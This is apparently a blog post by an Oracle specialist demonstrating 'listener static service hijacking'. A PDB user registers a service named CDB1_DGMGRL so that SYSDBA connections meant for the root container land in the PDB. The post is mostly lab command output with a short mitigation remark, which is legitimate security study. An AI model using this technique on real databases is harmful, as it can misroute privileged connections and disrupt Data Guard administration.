Oracle listener static service hi-jacking

# lsnrctl statusLSNRCTL for Linux: Version 19.0.0.0.0 - Development on 05-JAN-2019 18:06:26Copyright (c) 1991, 2018, Oracle.  All rights reserved.Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Linux: Version 19.0.0.0.0 - Development
Start Date 16-DEC-2018 17:33:58
Uptime 20 days 0 hr. 32 min. 28 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/19.0.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/VM190/listener/alert/log.xml
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=VM190)(PORT=1521)))
Services Summary...
Service "7cd707c6f0a7108ce053be38a8c0058b" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 1 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
SQL> connect demo/demo@//localhost/PDB1
Connected.
SQL> show con_nameCON_NAME
------------------------------
PDB1
SQL> exec dbms_service.create_service(service_name=>'CDB1_DGMGRL', network_name=>'CDB1_DGMGRL');PL/SQL procedure successfully completed.SQL> exec dbms_service.start_service('CDB1_DGMGRL');PL/SQL procedure successfully completed.
Services Summary...
Service "7cd707c6f0a7108ce053be38a8c0058b" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 2 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
# sqlplus -s sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL))(ADDRESS=(PROTOCOL=tcp)(HOST=127.0.0.1)(PORT=1521)))" as sysdba <<<'show con_name'CON_NAME
------------------------------
PDB1
# sqlplus -s sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL)(INSTANCE_NAME=CDB1)(STATIC_SERVICE=TRUE))(ADDRESS=(PROTOCOL=TCP)(HOST=127.0.0.1)(PORT=1521)))" as sysdba <<<'show con_name'CON_NAME
------------------------------
PDB1
SQL> connect demo/demo@//localhost/PDB1
Connected.
SQL> exec dbms_service.stop_service('CDB1_DGMGRL');
PL/SQL procedure successfully completed.
Services Summary...
Service "7cd707c6f0a7108ce053be38a8c0058b" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 1 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Service "pdb1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully
SQL> connect sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL))(ADDRESS=(PROTOCOL=tcp)(HOST=127.0.0.1)(PORT=1521)))" as sysdba
Connected.

SQL> select sys_context('userenv','service_name') from dual;
SYS_CONTEXT('USERENV','SERVICE_NAME')
--------------------------------------------------------------------
SYS$USERS
SQL> show con_nameCON_NAME
------------------------------
PDB1
SQL> exec dbms_service.delete_service('CDB1_DGMGRL');PL/SQL procedure successfully completed.# sqlplus -s sys/oracle@"(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=CDB1_DGMGRL)(INSTANCE_NAME=CDB1)(STATIC_SERVICE=TRUE))(ADDRESS=(PROTOCOL=TCP)(HOST=127.0.0.1)(PORT=1521)))" as sysdba <<<'show con_name'CON_NAME
------------------------------
CDB$ROOT

Solution(s)

Basics: be careful with powerful privileges, such as INHERIT PRIVILEGES, which can allow a PDB DBA to overwrite a common user procedure with authid current_user.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Franck Pachot

Franck Pachot

502 Followers

Developer Advocate at Yugabyte, Open Source distributed SQL database 🚀 Also Oracle ACE Director, Oracle Certified Master, AWS Data Hero, OakTable member